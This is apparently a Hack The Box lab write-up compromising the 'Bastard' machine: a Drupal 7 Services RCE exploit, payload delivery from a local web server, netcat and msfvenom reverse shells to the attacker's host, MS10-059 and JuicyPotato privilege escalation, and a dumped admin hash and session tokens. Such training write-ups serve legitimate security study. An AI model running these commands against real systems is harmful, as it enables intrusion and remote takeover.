Hack The Box: Bastard Write-up (#33)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.9
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • 80: — Running HTTP service, Microsoft IIS httpd 7.5
  • 135: — Running Microsoft Windows RPC
  • 49154: — Running Microsoft Windows RPC
Nmap scan report for ip-10-10-10-9.ap-southeast-1.compute.internal (10.10.10.9)
Host is up (0.0089s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
...
  1. Port 80 is running Microsoft IIS service version 7.5 which is associated with Windows 7 or Windows Server 2008 R2 Operation System (OS). The link for this info can be found here. It hosting Drupal version 7. Most likely this will be our entry point to the box.
  2. Port 135 and 49154 are associated with Microsoft RPC service. We can do the basic enumeration with Nmap NSE script.

Service Enumeration

Port 80 (HTTP service)

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension
[13:20:16] Starting: 
[13:24:23] 400 - 324B - /%ff/
[13:24:24] 200 - 8KB - /%3f/
[13:24:29] 200 - 7KB - /0
[13:53:02] 200 - 108KB - /changelog.txt
[14:18:49] 301 - 150B - /includes -> http://10.10.10.9/includes/
[14:19:42] 200 - 7KB - /index.php
[14:20:26] 200 - 2KB - /install.mysql.txt
[14:20:26] 200 - 2KB - /install.pgsql.txt
[14:20:30] 200 - 18KB - /install.txt
[14:20:31] 200 - 3KB - /install.php
[14:23:34] 200 - 18KB - /license.txt
[14:26:54] 200 - 9KB - /MAINTAINERS.txt
[14:29:40] 301 - 146B - /misc -> http://10.10.10.9/misc/
[14:30:16] 301 - 149B - /modules -> http://10.10.10.9/modules/
[14:32:37] 200 - 7KB - /node
[14:41:04] 301 - 150B - /profiles -> http://10.10.10.9/profiles/
[14:42:04] 200 - 5KB - /readme.txt
[14:42:44] 200 - 62B - /rest/
[14:42:51] 200 - 2KB - /robots.txt
[14:43:24] 301 - 149B - /scripts -> http://10.10.10.9/scripts/
[14:46:11] 301 - 147B - /sites -> http://10.10.10.9/sites/
[14:51:17] 301 - 148B - /themes -> http://10.10.10.9/themes/
[14:52:48] 200 - 10KB - /UPGRADE.txt
[14:53:29] 200 - 7KB - /user
[14:53:36] 200 - 7KB - /user/
[14:53:39] 200 - 7KB - /user/login/
[14:59:26] 200 - 42B - /xmlrpc.php

Exploitation

searchsploit drupal 7 remote code execution
searchsploit -m 41564.php
https://www.ambionics.io/blog/drupal-services-module-rce# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
...
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php
{
"uid": "1",
"name": "admin",
"mail": "drupal@hackthebox.gr",
"theme": "",
"created": "1489920428",
"access": "1599707255",
"login": 1599729403,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "drupal@hackthebox.gr",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
{                                                                                                                                           
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "RW7tPSxNdc5UP8TPkKtSBzobkdBNpJKsmv318gHi56A",
"token": "k47rjRP3P-5SI2dlBQ9uOblKtfWqrUsiE6QhlYzKy3E"
}
root@kali:/htb/Bastard# python3 -m http.server 443
root@kali:/htb/Bastard# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.9 - - [11/Sep/2020 01:17:46] "GET /nc64.exe HTTP/1.0" 200 -
10.10.10.9 - - [11/Sep/2020 01:17:53] "GET /shell.php HTTP/1.0" 200 -
nc -nlvp 53
nc64.exe -e cmd.exe 10.10.14.31 53

Post-Exploitation Enumeration

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .
systeminfo > //10.10.14.31/tools/systeminfo.txt
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
./windows-exploit-suggester.py --update
/windows-exploit-suggester.py --database 2020-09-11-mssb.xls --systeminfo /htb/Bastard/systeminfo.txt

Privilege Escalation

nc -nlvp 443
MS10-059.exe 10.10.14.31 443

Extra Content

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=53 -o shell.exe
nc -nlvp 53
JuicyPotato.exe -l 1337 -p C:\inetpub\drupal-7.54\shell.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
  • -p <program>: program to launch
  • -l <port>: COM server listen port
  • -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1–4291–83b6–3328366b9097})

Attack Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store